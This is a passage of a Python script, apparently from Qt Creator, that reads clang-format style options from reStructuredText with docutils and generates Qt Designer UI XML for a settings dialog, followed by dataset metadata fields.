value_item = ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + key + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
<item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">true</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">false</string>
</property>
</item>
</widget>
</item>
'''
elif value[0].startswith('std::string') or value[0] == 'unsigned' or value[0] == 'int':
value_item = ''' <item row="''' + str(index) + '''" column="1">
<layout class="QHBoxLayout">
<item>
<widget class="QLineEdit" name="''' + key + '''">
</widget>
</item>
<item>
<widget class="QPushButton" name="set''' + key + '''">
<property name="maximumSize">
<size>
<width>40</width>
<height>16777215</height>
</size>
</property>
<property name="text">
<string notr="true">Set</string>
</property>
</widget>
</item>
</layout>
</item>
'''
elif value[0].startswith('std::vector'):
value_item = ''' <item row="''' + str(index) + '''" column="1">
<layout class="QHBoxLayout">
<item>
<widget class="QPlainTextEdit" name="''' + key + '''">
<property name="sizePolicy">
<sizepolicy hsizetype="Expanding" vsizetype="Fixed"/>
</property>
<property name="maximumSize">
<size>
<width>16777215</width>
<height>50</height>
</size>
</property>
</widget>
</item>
<item>
<widget class="QPushButton" name="set''' + key + '''">
<property name="maximumSize">
<size>
<width>40</width>
<height>16777215</height>
</size>
</property>
<property name="text">
<string notr="true">Set</string>
</property>
</widget>
</item>
</layout>
</item>
'''
else:
if ' ' in value[1]:
value_item = ''
for i, val in enumerate(value):
if i == 0:
continue
index += 1
space_index = val.find(' ')
val = val[space_index + 1:]
value_item += ''' <item row="''' + str(index) + '''" column="0">
<widget class="QLabel" name="label''' + val + '''">
<property name="text">
<string notr="true"> ''' + val + '''</string>
</property>
</widget>
</item>
'''
value_item += ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + val + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
<item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">true</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">false</string>
</property>
</item>
</widget>
</item>
'''
else:
value_item = ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + key + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
'''
if key == 'Language':
value_item += ''' <property name="enabled">
<bool>false</bool>
</property>
'''
if index > 0:
value_item += ''' <item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
'''
for i, val in enumerate(value):
if i == 0:
continue
underline_index = val.find('_')
val = val[underline_index + 1:]
value_item += ''' <item>
<property name="text">
<string notr="true">''' + val + '''</string>
</property>
</item>
'''
value_item += ''' </widget>
</item>
'''
return label + value_item, index
class MyVisitor(docutils.nodes.NodeVisitor):
in_bullet_list = False
in_bullet_list_paragraph = False
tree = {}
last_key = ''
def visit_term(self, node):
node_values = node.traverse(condition=docutils.nodes.Text)
name = node_values[0].astext()
self.last_key = name
self.tree[name] = [node_values[2].astext()]
def visit_bullet_list(self, node):
self.in_bullet_list = True
def depart_bullet_list(self, node):
self.in_bullet_list = False
def visit_paragraph(self, node):
if self.in_bullet_list:
self.in_bullet_list_paragraph = True
def depart_paragraph(self, node):
self.in_bullet_list_paragraph = False
def visit_literal(self, node):
if self.in_bullet_list_paragraph:
value = node.traverse(condition=docutils.nodes.Text)[0].astext()
self.tree[self.last_key].append(value)
self.in_bullet_list_paragraph = False
def unknown_visit(self, node):
"""Called for all other node types."""
#print(node)
pass
def unknown_departure(self, node):
pass
def main():
arguments = parse_arguments()
content = file(arguments.options_rst).read()
document = parse_rst(content)
visitor = MyVisitor(document)
document.walkabout(visitor)
keys = visitor.tree.keys()
basedOnStyleKey = 'BasedOnStyle'
keys.remove(basedOnStyleKey)
keys.sort()
text = ''
line, index = createItem(basedOnStyleKey, visitor.tree[basedOnStyleKey], 0)
text += line
index = 1
for key in keys:
line, index = createItem(key, visitor.tree[key], index)
text += line
index += 1
current_path = os.path.dirname(os.path.abspath(__file__))
ui_path = os.path.abspath(os.path.join(current_path, '..', 'src',
'plugins', 'clangformat', 'clangformatchecks.ui'))
with open(ui_path, 'w') as f:
f.write(full_ui_content(text))
if __name__ == "__main__":
main()
|
gpl-3.0
| -6,718,310,938,669,209,000
| 30.013746
| 97
| 0.560665
| false
| 3.718583
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.